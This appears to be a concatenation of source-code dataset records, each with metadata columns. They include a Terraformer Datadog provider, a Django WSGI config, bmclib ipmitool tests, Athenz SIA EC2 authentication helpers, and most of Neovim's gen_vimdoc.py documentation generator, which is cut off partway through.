// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package datadog
import (
"context"
"errors"
"fmt"
"net/url"
"os"
"strconv"
datadogV1 "github.com/DataDog/datadog-api-client-go/api/v1/datadog"
datadogV2 "github.com/DataDog/datadog-api-client-go/api/v2/datadog"
"github.com/GoogleCloudPlatform/terraformer/terraformutils"
"github.com/zclconf/go-cty/cty"
)
type DatadogProvider struct { //nolint
terraformutils.Provider
apiKey string
appKey string
apiURL string
validate bool
authV1 context.Context
authV2 context.Context
datadogClientV1 *datadogV1.APIClient
datadogClientV2 *datadogV2.APIClient
}
// Init check env params and initialize API Client
func (p *DatadogProvider) Init(args []string) error {
if args[3] != "" {
validate, validateErr := strconv.ParseBool(args[3])
if validateErr != nil {
return fmt.Errorf(`invalid validate arg : %v`, validateErr)
}
p.validate = validate
} else if os.Getenv("DATADOG_VALIDATE") != "" {
validate, validateErr := strconv.ParseBool(os.Getenv("DATADOG_VALIDATE"))
if validateErr != nil {
return fmt.Errorf(`invalid DATADOG_VALIDATE env var : %v`, validateErr)
}
p.validate = validate
} else {
p.validate = true
}
if args[0] != "" {
p.apiKey = args[0]
} else {
if apiKey := os.Getenv("DATADOG_API_KEY"); apiKey != "" {
p.apiKey = apiKey
} else if p.validate {
return errors.New("api-key requirement")
}
}
if args[1] != "" {
p.appKey = args[1]
} else {
if appKey := os.Getenv("DATADOG_APP_KEY"); appKey != "" {
p.appKey = appKey
} else if p.validate {
return errors.New("app-key requirement")
}
}
if args[2] != "" {
p.apiURL = args[2]
} else if v := os.Getenv("DATADOG_HOST"); v != "" {
p.apiURL = v
}
// Initialize the Datadog V1 API client
authV1 := context.WithValue(
context.Background(),
datadogV1.ContextAPIKeys,
map[string]datadogV1.APIKey{
"apiKeyAuth": {
Key: p.apiKey,
},
"appKeyAuth": {
Key: p.appKey,
},
},
)
if p.apiURL != "" {
parsedAPIURL, parseErr := url.Parse(p.apiURL)
if parseErr != nil {
return fmt.Errorf(`invalid API Url : %v`, parseErr)
}
if parsedAPIURL.Host == "" || parsedAPIURL.Scheme == "" {
return fmt.Errorf(`missing protocol or host : %v`, p.apiURL)
}
// If an API URL is passed, select ServerIndex 1 and supply its host and protocol as server variables
authV1 = context.WithValue(authV1, datadogV1.ContextServerIndex, 1)
authV1 = context.WithValue(authV1, datadogV1.ContextServerVariables, map[string]string{
"name": parsedAPIURL.Host,
"protocol": parsedAPIURL.Scheme,
})
}
configV1 := datadogV1.NewConfiguration()
datadogClientV1 := datadogV1.NewAPIClient(configV1)
// Initialize the Datadog V2 API client
authV2 := context.WithValue(
context.Background(),
datadogV2.ContextAPIKeys,
map[string]datadogV2.APIKey{
"apiKeyAuth": {
Key: p.apiKey,
},
"appKeyAuth": {
Key: p.appKey,
},
},
)
if p.apiURL != "" {
parsedAPIURL, parseErr := url.Parse(p.apiURL)
if parseErr != nil {
return fmt.Errorf(`invalid API Url : %v`, parseErr)
}
if parsedAPIURL.Host == "" || parsedAPIURL.Scheme == "" {
return fmt.Errorf(`missing protocol or host : %v`, p.apiURL)
}
// If an API URL is passed, select ServerIndex 1 and supply its host and protocol as server variables
authV2 = context.WithValue(authV2, datadogV2.ContextServerIndex, 1)
authV2 = context.WithValue(authV2, datadogV2.ContextServerVariables, map[string]string{
"name": parsedAPIURL.Host,
"protocol": parsedAPIURL.Scheme,
})
}
configV2 := datadogV2.NewConfiguration()
datadogClientV2 := datadogV2.NewAPIClient(configV2)
p.authV1 = authV1
p.authV2 = authV2
p.datadogClientV1 = datadogClientV1
p.datadogClientV2 = datadogClientV2
return nil
}
// GetName returns the provider name for Datadog
func (p *DatadogProvider) GetName() string {
return "datadog"
}
// GetConfig returns the provider configuration for Datadog
func (p *DatadogProvider) GetConfig() cty.Value {
return cty.ObjectVal(map[string]cty.Value{
"api_key": cty.StringVal(p.apiKey),
"app_key": cty.StringVal(p.appKey),
"api_url": cty.StringVal(p.apiURL),
"validate": cty.BoolVal(p.validate),
})
}
// InitService ...
func (p *DatadogProvider) InitService(serviceName string, verbose bool) error {
var isSupported bool
if _, isSupported = p.GetSupportedService()[serviceName]; !isSupported {
return errors.New(p.GetName() + ": " + serviceName + " not supported service")
}
p.Service = p.GetSupportedService()[serviceName]
p.Service.SetName(serviceName)
p.Service.SetVerbose(verbose)
p.Service.SetProviderName(p.GetName())
p.Service.SetArgs(map[string]interface{}{
"api-key": p.apiKey,
"app-key": p.appKey,
"api-url": p.apiURL,
"validate": p.validate,
"authV1": p.authV1,
"authV2": p.authV2,
"datadogClientV1": p.datadogClientV1,
"datadogClientV2": p.datadogClientV2,
})
return nil
}
// GetSupportedService returns the map of supported services for Datadog
func (p *DatadogProvider) GetSupportedService() map[string]terraformutils.ServiceGenerator {
return map[string]terraformutils.ServiceGenerator{
"dashboard_list": &DashboardListGenerator{},
"dashboard": &DashboardGenerator{},
"dashboard_json": &DashboardJSONGenerator{},
"downtime": &DowntimeGenerator{},
"logs_archive": &LogsArchiveGenerator{},
"logs_archive_order": &LogsArchiveOrderGenerator{},
"logs_custom_pipeline": &LogsCustomPipelineGenerator{},
"logs_index": &LogsIndexGenerator{},
"logs_index_order": &LogsIndexOrderGenerator{},
"logs_integration_pipeline": &LogsIntegrationPipelineGenerator{},
"logs_pipeline_order": &LogsPipelineOrderGenerator{},
"integration_aws": &IntegrationAWSGenerator{},
"integration_aws_lambda_arn": &IntegrationAWSLambdaARNGenerator{},
"integration_aws_log_collection": &IntegrationAWSLogCollectionGenerator{},
"integration_azure": &IntegrationAzureGenerator{},
"integration_gcp": &IntegrationGCPGenerator{},
"integration_pagerduty": &IntegrationPagerdutyGenerator{},
"integration_pagerduty_service_object": &IntegrationPagerdutyServiceObjectGenerator{},
"integration_slack_channel": &IntegrationSlackChannelGenerator{},
"metric_metadata": &MetricMetadataGenerator{},
"monitor": &MonitorGenerator{},
"security_monitoring_default_rule": &SecurityMonitoringDefaultRuleGenerator{},
"security_monitoring_rule": &SecurityMonitoringRuleGenerator{},
"service_level_objective": &ServiceLevelObjectiveGenerator{},
"synthetics_test": &SyntheticsTestGenerator{},
"synthetics_global_variable": &SyntheticsGlobalVariableGenerator{},
"synthetics_private_location": &SyntheticsPrivateLocationGenerator{},
"user": &UserGenerator{},
"role": &RoleGenerator{},
}
}
// GetResourceConnections returns the map of resource connections for Datadog
func (p DatadogProvider) GetResourceConnections() map[string]map[string][]string {
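// Outer keys are resource types, inner keys are the resource types they
// reference; each slice alternates between the attribute on the referencing
// resource and the matching attribute on the referenced resource.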
return map[string]map[string][]string{
"dashboard": {
"monitor": {
"widget.alert_graph_definition.alert_id", "id",
"widget.group_definition.widget.alert_graph_definition.alert_id", "id",
"widget.alert_value_definition.alert_id", "id",
"widget.group_definition.widget.alert_value_definition.alert_id", "id",
},
"service_level_objective": {
"widget.service_level_objective_definition.slo_id", "id",
"widget.group_definition.widget.service_level_objective_definition.slo_id", "id",
},
},
"dashboard_list": {
"dashboard": {
"dash_item.dash_id", "id",
},
},
"downtime": {
"monitor": {
"monitor_id", "id",
},
},
"integration_aws_lambda_arn": {
"integration_aws": {
"account_id", "account_id",
},
},
"integration_aws_log_collection": {
"integration_aws": {
"account_id", "account_id",
},
},
"logs_archive": {
"integration_aws": {
"s3.account_id", "account_id",
"s3.role_name", "role_name",
"s3_archive.account_id", "account_id",
"s3_archive.role_name", "role_name",
},
"integration_gcp": {
"gcs.project_id", "project_id",
"gcs.client_email", "client_email",
"gcs_archive.project_id", "project_id",
"gcs_archive.client_email", "client_email",
},
"integration_azure": {
"azure.client_id", "client_id",
"azure.tenant_id", "tenant_name",
"azure_archive.client_id", "client_id",
"azure_archive.tenant_id", "tenant_name",
},
},
"logs_archive_order": {
"logs_archive": {
"archive_ids", "id",
},
},
"logs_index_order": {
"logs_index": {
"indexes", "id",
},
},
"logs_pipeline_order": {
"logs_integration_pipeline": {
"pipelines", "id",
},
"logs_custom_pipeline": {
"pipelines", "id",
},
},
"monitor": {
"role": {
"restricted_roles", "id",
},
},
"service_level_objective": {
"monitor": {
"monitor_ids", "id",
},
},
"synthetics_test": {
"synthetics_private_location": {
"locations", "id",
},
},
"synthetics_global_variable": {
"synthetics_test": {
"parse_test_id", "id",
},
},
"user": {
"role": {
"roles", "id",
},
},
}
}
// GetProviderData returns the provider data for Datadog
func (p DatadogProvider) GetProviderData(arg ...string) map[string]interface{} {
return map[string]interface{}{}
}
|
[
"\"DATADOG_VALIDATE\"",
"\"DATADOG_VALIDATE\"",
"\"DATADOG_API_KEY\"",
"\"DATADOG_APP_KEY\"",
"\"DATADOG_HOST\""
] |
[] |
[
"DATADOG_APP_KEY",
"DATADOG_HOST",
"DATADOG_VALIDATE",
"DATADOG_API_KEY"
] |
[]
|
["DATADOG_APP_KEY", "DATADOG_HOST", "DATADOG_VALIDATE", "DATADOG_API_KEY"]
|
go
| 4 | 0 | |
WEB(BE)/api_server/api_server/wsgi.py
|
"""
WSGI config for api_server project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'api_server.settings')
application = get_wsgi_application()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
providers/ipmitool/ipmitool_test.go
|
package ipmitool
import (
"context"
"errors"
"fmt"
"io/ioutil"
"os"
"os/exec"
"path/filepath"
"reflect"
"testing"
"time"
"bou.ke/monkey"
"github.com/bmc-toolbox/bmclib/internal/ipmi"
"github.com/bmc-toolbox/bmclib/logging"
)
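// TestMain makes sure an "ipmitool" binary can be found on PATH: when it is
// missing, an empty executable stub is written to a temp directory which is
// appended to PATH for the duration of the tests.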
func TestMain(m *testing.M) {
var tempDir string
_, err := exec.LookPath("ipmitool")
if err != nil {
tempDir, err = ioutil.TempDir("/tmp", "")
if err != nil {
os.Exit(2)
}
path := os.Getenv("PATH") + ":" + tempDir
os.Setenv("PATH", path)
fmt.Println(os.Getenv("PATH"))
f := filepath.Join(tempDir, "ipmitool")
err = ioutil.WriteFile(f, []byte{}, 0755)
if err != nil {
os.RemoveAll(tempDir)
os.Exit(3)
}
}
code := m.Run()
os.RemoveAll(tempDir)
os.Exit(code)
}
func TestIsCompatible(t *testing.T) {
testCases := []struct {
name string
ok bool
}{
{"true", true},
{"false", false},
}
for _, tc := range testCases {
tc := tc
t.Run(tc.name, func(t *testing.T) {
var ipm *ipmi.Ipmi
monkey.PatchInstanceMethod(reflect.TypeOf(ipm), "PowerState", func(_ *ipmi.Ipmi, _ context.Context) (status string, err error) {
if !tc.ok {
err = errors.New("not compatible")
}
return "on", err
})
ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
defer cancel()
user := "ADMIN"
pass := "ADMIN"
host := "127.1.1.1"
port := "623"
i, _ := ipmi.New(user, pass, host+":"+port)
c := Conn{
Host: host,
Port: port,
User: user,
Pass: pass,
Log: logging.DefaultLogger(),
con: i,
}
ok := c.Compatible(ctx)
if ok != tc.ok {
t.Fatalf("got: %v, expected: %v", ok, tc.ok)
}
})
}
}
func TestPowerState(t *testing.T) {
t.Skip("need real ipmi server")
user := "ADMIN"
pass := "ADMIN"
host := "127.0.0.1"
port := "623"
i, _ := ipmi.New(user, pass, host+":"+port)
c := Conn{
Host: host,
Port: port,
User: user,
Pass: pass,
Log: logging.DefaultLogger(),
con: i,
}
state, err := c.PowerStateGet(context.Background())
if err != nil {
t.Fatal(err)
}
t.Log(state)
t.Fatal()
}
func TestPowerSet1(t *testing.T) {
t.Skip("need real ipmi server")
user := "ADMIN"
pass := "ADMIN"
host := "127.0.0.1"
port := "623"
i, _ := ipmi.New(user, pass, host+":"+port)
c := Conn{
Host: host,
Port: port,
User: user,
Pass: pass,
Log: logging.DefaultLogger(),
con: i,
}
state, err := c.PowerSet(context.Background(), "soft")
if err != nil {
t.Fatal(err)
}
t.Log(state)
t.Fatal()
}
func TestBootDeviceSet2(t *testing.T) {
t.Skip("need real ipmi server")
i := Conn{
Host: "127.0.0.1",
Port: "623",
User: "ADMIN",
Pass: "ADMIN",
Log: logging.DefaultLogger(),
}
state, err := i.BootDeviceSet(context.Background(), "disk", false, false)
if err != nil {
t.Fatal(err)
}
t.Log(state)
t.Fatal()
}
func TestBMCReset(t *testing.T) {
t.Skip("need real ipmi server")
i := Conn{
Host: "127.0.0.1",
Port: "623",
User: "ADMIN",
Pass: "ADMIN",
Log: logging.DefaultLogger(),
}
state, err := i.BmcReset(context.Background(), "warm")
if err != nil {
t.Fatal(err)
}
t.Log(state)
t.Fatal()
}
|
[
"\"PATH\"",
"\"PATH\""
] |
[] |
[
"PATH"
] |
[]
|
["PATH"]
|
go
| 1 | 0 | |
provider/aws/sia-ec2/authn.go
|
//
// Copyright Athenz Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
package sia
import (
"encoding/json"
"io"
"io/ioutil"
"os"
"time"
"github.com/AthenZ/athenz/libs/go/sia/aws/meta"
"github.com/AthenZ/athenz/libs/go/sia/aws/options"
"github.com/AthenZ/athenz/libs/go/sia/logutil"
"github.com/AthenZ/athenz/libs/go/sia/util"
)
func getDocValue(docMap map[string]interface{}, key string) string {
value := docMap[key]
if value == nil {
return ""
}
return value.(string)
}
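// GetEC2DocumentDetails fetches the EC2 instance identity document and its
// PKCS7 signature from the metadata endpoint and extracts the account id,
// instance id, region and pending time from the document.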
func GetEC2DocumentDetails(metaEndPoint string) ([]byte, []byte, string, string, string, *time.Time, error) {
document, err := meta.GetData(metaEndPoint, "/latest/dynamic/instance-identity/document")
if err != nil {
return nil, nil, "", "", "", nil, err
}
signature, err := meta.GetData(metaEndPoint, "/latest/dynamic/instance-identity/pkcs7")
if err != nil {
return nil, nil, "", "", "", nil, err
}
var docMap map[string]interface{}
err = json.Unmarshal(document, &docMap)
if err != nil {
return nil, nil, "", "", "", nil, err
}
account := getDocValue(docMap, "accountId")
region := getDocValue(docMap, "region")
instanceId := getDocValue(docMap, "instanceId")
timeCheck, _ := time.Parse(time.RFC3339, getDocValue(docMap, "pendingTime"))
return document, signature, account, instanceId, region, &timeCheck, err
}
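// GetECSOnEC2TaskId returns the ECS task id when running as an ECS container
// on an EC2 instance, parsed from the metadata file referenced by the
// ECS_CONTAINER_METADATA_FILE environment variable; otherwise it returns "".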
func GetECSOnEC2TaskId(sysLogger io.Writer) string {
ecs := os.Getenv("ECS_CONTAINER_METADATA_FILE")
if ecs == "" {
logutil.LogInfo(sysLogger, "Not ECS on EC2 instance\n")
return ""
}
ecsMetaData, err := ioutil.ReadFile(ecs)
if err != nil {
logutil.LogInfo(sysLogger, "Unable to read ECS on EC2 instance metadata: %s - %v\n", ecs, err)
return ""
}
var docMap map[string]interface{}
err = json.Unmarshal(ecsMetaData, &docMap)
if err != nil {
logutil.LogInfo(sysLogger, "Unable to parse ECS on EC2 instance metadata: %s - %v\n", ecs, err)
return ""
}
taskArn := getDocValue(docMap, "TaskARN")
_, taskId, _, err := util.ParseTaskArn(taskArn)
if err != nil {
logutil.LogInfo(sysLogger, "Unable to parse ECS on EC2 task id: %s - %v\n", taskArn, err)
return ""
}
return taskId
}
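// GetEC2Config builds the SIA options from the configuration file and, when
// that fails, falls back in order to environment variables, security
// credentials and finally the IAM profile ARN to determine the service name.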
func GetEC2Config(configFile, metaEndpoint string, useRegionalSTS bool, region, account string, sysLogger io.Writer) (*options.Config, *options.ConfigAccount, error) {
config, configAccount, err := options.InitFileConfig(configFile, metaEndpoint, useRegionalSTS, region, account, sysLogger)
if err != nil {
logutil.LogInfo(sysLogger, "Unable to process configuration file '%s': %v\n", configFile, err)
logutil.LogInfo(sysLogger, "Trying to determine service details from the environment variables...\n")
config, configAccount, err = options.InitEnvConfig(config)
if err != nil {
logutil.LogInfo(sysLogger, "Unable to process environment settings: %v\n", err)
// if we do not have settings in our environment, we're going
// to fall back to the <domain>.<service>-service naming structure
logutil.LogInfo(sysLogger, "Trying to determine service name security credentials...\n")
configAccount, err = options.InitCredsConfig("-service", useRegionalSTS, region, sysLogger)
if err != nil {
logutil.LogInfo(sysLogger, "Unable to process security credentials: %v\n", err)
logutil.LogInfo(sysLogger, "Trying to determine service name from profile arn...\n")
configAccount, err = options.InitProfileConfig(metaEndpoint, "-service")
if err != nil {
logutil.LogInfo(sysLogger, "Unable to determine service name: %v\n", err)
return config, nil, err
}
}
}
}
return config, configAccount, nil
}
|
[
"\"ECS_CONTAINER_METADATA_FILE\""
] |
[] |
[
"ECS_CONTAINER_METADATA_FILE"
] |
[]
|
["ECS_CONTAINER_METADATA_FILE"]
|
go
| 1 | 0 | |
scripts/gen_vimdoc.py
|
#!/usr/bin/env python3
"""Generates Nvim :help docs from C/Lua docstrings, using Doxygen.
Also generates *.mpack files. To inspect the *.mpack structure:
:new | put=v:lua.vim.inspect(msgpackparse(readfile('runtime/doc/api.mpack')))
Flow:
main
extract_from_xml
fmt_node_as_vimhelp \
para_as_map } recursive
update_params_map /
render_node
This would be easier using lxml and XSLT, but:
1. This should avoid needing Python dependencies, especially ones that are
C modules that have library dependencies (lxml requires libxml and
libxslt).
2. I wouldn't know how to deal with nested indentation in <para> tags using
XSLT.
Each function :help block is formatted as follows:
- Max width of 78 columns (`text_width`).
- Indent with spaces (not tabs).
- Indent of 16 columns for body text.
- Function signature and helptag (right-aligned) on the same line.
- Signature and helptag must have a minimum of 8 spaces between them.
- If the signature is too long, it is placed on the line after the helptag.
Signature wraps at `text_width - 8` characters with subsequent
lines indented to the open parenthesis.
- Subsection bodies are indented an additional 4 spaces.
- Body consists of function description, parameters, return description, and
C declaration (`INCLUDE_C_DECL`).
- Parameters are omitted for the `void` and `Error *` types, or if the
parameter is marked as [out].
- Each function documentation is separated by a single line.
"""
import argparse
import os
import re
import sys
import shutil
import textwrap
import subprocess
import collections
import msgpack
import logging
from xml.dom import minidom
MIN_PYTHON_VERSION = (3, 6)
MIN_DOXYGEN_VERSION = (1, 9, 0)
if sys.version_info < MIN_PYTHON_VERSION:
print("requires Python {}.{}+".format(*MIN_PYTHON_VERSION))
sys.exit(1)
doxygen_version = tuple([int(i) for i in subprocess.check_output(["doxygen", "-v"],
universal_newlines=True).split()[0].split('.')])
if doxygen_version < MIN_DOXYGEN_VERSION:
print("\nRequires doxygen {}.{}.{}+".format(*MIN_DOXYGEN_VERSION))
print("Your doxygen version is {}.{}.{}\n".format(*doxygen_version))
sys.exit(1)
# DEBUG = ('DEBUG' in os.environ)
INCLUDE_C_DECL = ('INCLUDE_C_DECL' in os.environ)
INCLUDE_DEPRECATED = ('INCLUDE_DEPRECATED' in os.environ)
log = logging.getLogger(__name__)
LOG_LEVELS = {
logging.getLevelName(level): level for level in [
logging.DEBUG, logging.INFO, logging.ERROR
]
}
text_width = 78
script_path = os.path.abspath(__file__)
base_dir = os.path.dirname(os.path.dirname(script_path))
out_dir = os.path.join(base_dir, 'tmp-{target}-doc')
filter_cmd = '%s %s' % (sys.executable, script_path)
msgs = [] # Messages to show on exit.
lua2dox_filter = os.path.join(base_dir, 'scripts', 'lua2dox_filter')
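# Documentation targets: each entry maps a target name to its doxygen inputs,
# section ordering and the :help section/tag formatting used when rendering.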
CONFIG = {
'api': {
'mode': 'c',
'filename': 'api.txt',
# Section ordering.
'section_order': [
'vim.c',
'vimscript.c',
'buffer.c',
'extmark.c',
'window.c',
'win_config.c',
'tabpage.c',
'autocmd.c',
'ui.c',
],
# List of files/directories for doxygen to read, relative to `base_dir`
'files': ['src/nvim/api'],
# file patterns used by doxygen
'file_patterns': '*.h *.c',
# Only function with this prefix are considered
'fn_name_prefix': 'nvim_',
# Section name overrides.
'section_name': {
'vim.c': 'Global',
},
# For generated section names.
'section_fmt': lambda name: f'{name} Functions',
# Section helptag.
'helptag_fmt': lambda name: f'*api-{name.lower()}*',
# Per-function helptag.
'fn_helptag_fmt': lambda fstem, name: f'*{name}()*',
# Module name overrides (for Lua).
'module_override': {},
# Append the docs for these modules, do not start a new section.
'append_only': [],
},
'lua': {
'mode': 'lua',
'filename': 'lua.txt',
'section_order': [
'_editor.lua',
'shared.lua',
'uri.lua',
'ui.lua',
'filetype.lua',
'keymap.lua',
'fs.lua',
],
'files': [
'runtime/lua/vim/_editor.lua',
'runtime/lua/vim/shared.lua',
'runtime/lua/vim/uri.lua',
'runtime/lua/vim/ui.lua',
'runtime/lua/vim/filetype.lua',
'runtime/lua/vim/keymap.lua',
'runtime/lua/vim/fs.lua',
],
'file_patterns': '*.lua',
'fn_name_prefix': '',
'section_name': {
'lsp.lua': 'core',
},
'section_fmt': lambda name: (
'Lua module: vim'
if name.lower() == '_editor'
else f'Lua module: {name.lower()}'),
'helptag_fmt': lambda name: (
'*lua-vim*'
if name.lower() == '_editor'
else f'*lua-{name.lower()}*'),
'fn_helptag_fmt': lambda fstem, name: (
f'*vim.{name}()*'
if fstem.lower() == '_editor'
else f'*{fstem}.{name}()*'),
'module_override': {
# `shared` functions are exposed on the `vim` module.
'shared': 'vim',
'uri': 'vim',
'ui': 'vim.ui',
'filetype': 'vim.filetype',
'keymap': 'vim.keymap',
'fs': 'vim.fs',
},
'append_only': [
'shared.lua',
],
},
'lsp': {
'mode': 'lua',
'filename': 'lsp.txt',
'section_order': [
'lsp.lua',
'buf.lua',
'diagnostic.lua',
'codelens.lua',
'tagfunc.lua',
'handlers.lua',
'util.lua',
'log.lua',
'rpc.lua',
'sync.lua',
'protocol.lua',
],
'files': [
'runtime/lua/vim/lsp',
'runtime/lua/vim/lsp.lua',
],
'file_patterns': '*.lua',
'fn_name_prefix': '',
'section_name': {'lsp.lua': 'lsp'},
'section_fmt': lambda name: (
'Lua module: vim.lsp'
if name.lower() == 'lsp'
else f'Lua module: vim.lsp.{name.lower()}'),
'helptag_fmt': lambda name: (
'*lsp-core*'
if name.lower() == 'lsp'
else f'*lsp-{name.lower()}*'),
'fn_helptag_fmt': lambda fstem, name: (
f'*vim.lsp.{name}()*'
if fstem == 'lsp' and name != 'client'
else (
'*vim.lsp.client*'
# HACK. TODO(justinmk): class/structure support in lua2dox
if 'lsp.client' == f'{fstem}.{name}'
else f'*vim.lsp.{fstem}.{name}()*')),
'module_override': {},
'append_only': [],
},
'diagnostic': {
'mode': 'lua',
'filename': 'diagnostic.txt',
'section_order': [
'diagnostic.lua',
],
'files': ['runtime/lua/vim/diagnostic.lua'],
'file_patterns': '*.lua',
'fn_name_prefix': '',
'section_name': {'diagnostic.lua': 'diagnostic'},
'section_fmt': lambda _: 'Lua module: vim.diagnostic',
'helptag_fmt': lambda _: '*diagnostic-api*',
'fn_helptag_fmt': lambda fstem, name: f'*vim.{fstem}.{name}()*',
'module_override': {},
'append_only': [],
},
'treesitter': {
'mode': 'lua',
'filename': 'treesitter.txt',
'section_order': [
'treesitter.lua',
'language.lua',
'query.lua',
'highlighter.lua',
'languagetree.lua',
],
'files': [
'runtime/lua/vim/treesitter.lua',
'runtime/lua/vim/treesitter/',
],
'file_patterns': '*.lua',
'fn_name_prefix': '',
'section_name': {},
'section_fmt': lambda name: (
'Lua module: vim.treesitter'
if name.lower() == 'treesitter'
else f'Lua module: vim.treesitter.{name.lower()}'),
'helptag_fmt': lambda name: (
'*lua-treesitter-core*'
if name.lower() == 'treesitter'
else f'*treesitter-{name.lower()}*'),
'fn_helptag_fmt': lambda fstem, name: (
f'*{name}()*'
if name != 'new'
else f'*{fstem}.{name}()*'),
# 'fn_helptag_fmt': lambda fstem, name: (
# f'*vim.treesitter.{name}()*'
# if fstem == 'treesitter'
# else (
# '*vim.lsp.client*'
# # HACK. TODO(justinmk): class/structure support in lua2dox
# if 'lsp.client' == f'{fstem}.{name}'
# else f'*vim.lsp.{fstem}.{name}()*')),
'module_override': {},
'append_only': [],
}
}
param_exclude = (
'channel_id',
)
# Annotations are displayed as line items after API function descriptions.
annotation_map = {
'FUNC_API_FAST': '|api-fast|',
'FUNC_API_CHECK_TEXTLOCK': 'not allowed when |textlock| is active',
'FUNC_API_REMOTE_ONLY': '|RPC| only',
'FUNC_API_LUA_ONLY': '|vim.api| only',
}
# Raises an error with details about `o` if `cond` is callable and returns
# True, or if `cond` is truthy or is contained in `o`.
def debug_this(o, cond=True):
name = ''
if not isinstance(o, str):
try:
name = o.nodeName
o = o.toprettyxml(indent=' ', newl='\n')
except Exception:
pass
if ((callable(cond) and cond())
or (not callable(cond) and cond)
or (not callable(cond) and cond in o)):
raise RuntimeError('xxx: {}\n{}'.format(name, o))
# Appends a message to a list which will be printed on exit.
def msg(s):
msgs.append(s)
# Print all collected messages.
def msg_report():
for m in msgs:
print(f' {m}')
# Print collected messages, then throw an exception.
def fail(s):
msg_report()
raise RuntimeError(s)
def find_first(parent, name):
"""Finds the first matching node within parent."""
sub = parent.getElementsByTagName(name)
if not sub:
return None
return sub[0]
def iter_children(parent, name):
"""Yields matching child nodes within parent."""
for child in parent.childNodes:
if child.nodeType == child.ELEMENT_NODE and child.nodeName == name:
yield child
def get_child(parent, name):
"""Gets the first matching child node."""
for child in iter_children(parent, name):
return child
return None
def self_or_child(n):
"""Gets the first child node, or self."""
if len(n.childNodes) == 0:
return n
return n.childNodes[0]
def clean_lines(text):
"""Removes superfluous lines.
The beginning and end of the string is trimmed. Empty lines are collapsed.
"""
return re.sub(r'\A\n\s*\n*|\n\s*\n*\Z', '', re.sub(r'(\n\s*\n+)+', '\n\n', text))
def is_blank(text):
return '' == clean_lines(text)
def get_text(n, preformatted=False):
"""Recursively concatenates all text in a node tree."""
text = ''
if n.nodeType == n.TEXT_NODE:
return n.data
if n.nodeName == 'computeroutput':
for node in n.childNodes:
text += get_text(node)
return '`{}`'.format(text)
for node in n.childNodes:
if node.nodeType == node.TEXT_NODE:
text += node.data
elif node.nodeType == node.ELEMENT_NODE:
text += get_text(node, preformatted)
return text
# Gets the length of the last line in `text`, excluding newline ("\n") char.
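# For example (illustrative): len_lastline("foo\nbar") == 3, and a trailing
# newline is ignored, so len_lastline("foo\n") == 3 as well.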
def len_lastline(text):
lastnl = text.rfind('\n')
if -1 == lastnl:
return len(text)
if '\n' == text[-1]:
return lastnl - (1 + text.rfind('\n', 0, lastnl))
return len(text) - (1 + lastnl)
def len_lastline_withoutindent(text, indent):
n = len_lastline(text)
return (n - len(indent)) if n > len(indent) else 0
# Returns True if node `n` contains only inline (not block-level) elements.
def is_inline(n):
# if len(n.childNodes) == 0:
# return n.nodeType == n.TEXT_NODE or n.nodeName == 'computeroutput'
for c in n.childNodes:
if c.nodeType != c.TEXT_NODE and c.nodeName != 'computeroutput':
return False
if not is_inline(c):
return False
return True
def doc_wrap(text, prefix='', width=70, func=False, indent=None):
"""Wraps text to `width`.
First line is prefixed with `prefix`, subsequent lines are aligned.
If `func` is True, only wrap at commas.
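For example (illustrative), doc_wrap('a b c', prefix='- ', width=4) produces
the three lines '- a', '  b' and '  c'.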
"""
if not width:
# return prefix + text
return text
# Whitespace used to indent all lines except the first line.
indent = ' ' * len(prefix) if indent is None else indent
indent_only = (prefix == '' and indent is not None)
if func:
lines = [prefix]
for part in text.split(', '):
if part[-1] not in ');':
part += ', '
if len(lines[-1]) + len(part) > width:
lines.append(indent)
lines[-1] += part
return '\n'.join(x.rstrip() for x in lines).rstrip()
# XXX: Dummy prefix to force TextWrapper() to wrap the first line.
if indent_only:
prefix = indent
tw = textwrap.TextWrapper(break_long_words=False,
break_on_hyphens=False,
width=width,
initial_indent=prefix,
subsequent_indent=indent)
result = '\n'.join(tw.wrap(text.strip()))
# XXX: Remove the dummy prefix.
if indent_only:
result = result[len(indent):]
return result
def max_name(names):
if len(names) == 0:
return 0
return max(len(name) for name in names)
def update_params_map(parent, ret_map, width=62):
"""Updates `ret_map` with name:desc key-value pairs extracted
from Doxygen XML node `parent`.
"""
params = collections.OrderedDict()
for node in parent.childNodes:
if node.nodeType == node.TEXT_NODE:
continue
name_node = find_first(node, 'parametername')
if name_node.getAttribute('direction') == 'out':
continue
name = get_text(name_node)
if name in param_exclude:
continue
params[name.strip()] = node
max_name_len = max_name(params.keys()) + 8
# `ret_map` is a name:desc map.
for name, node in params.items():
desc = ''
desc_node = get_child(node, 'parameterdescription')
if desc_node:
desc = fmt_node_as_vimhelp(
desc_node, width=width, indent=(' ' * max_name_len))
ret_map[name] = desc
return ret_map
def render_node(n, text, prefix='', indent='', width=62, fmt_vimhelp=False):
"""Renders a node as Vim help text, recursively traversing all descendants."""
def ind(s):
return s if fmt_vimhelp else ''
text = ''
# space_preceding = (len(text) > 0 and ' ' == text[-1][-1])
# text += (int(not space_preceding) * ' ')
if n.nodeName == 'preformatted':
o = get_text(n, preformatted=True)
ensure_nl = '' if o[-1] == '\n' else '\n'
text += '>{}{}\n<'.format(ensure_nl, o)
elif is_inline(n):
text = doc_wrap(get_text(n), indent=indent, width=width)
elif n.nodeName == 'verbatim':
# TODO: currently we don't use this. The "[verbatim]" hint is there as
# a reminder that we must decide how to format this if we do use it.
text += ' [verbatim] {}'.format(get_text(n))
elif n.nodeName == 'listitem':
for c in n.childNodes:
result = render_node(
c,
text,
indent=indent + (' ' * len(prefix)),
width=width
)
if is_blank(result):
continue
text += indent + prefix + result
elif n.nodeName in ('para', 'heading'):
for c in n.childNodes:
if (is_inline(c)
and '' != get_text(c).strip()
and text
and ' ' != text[-1]):
text += ' '
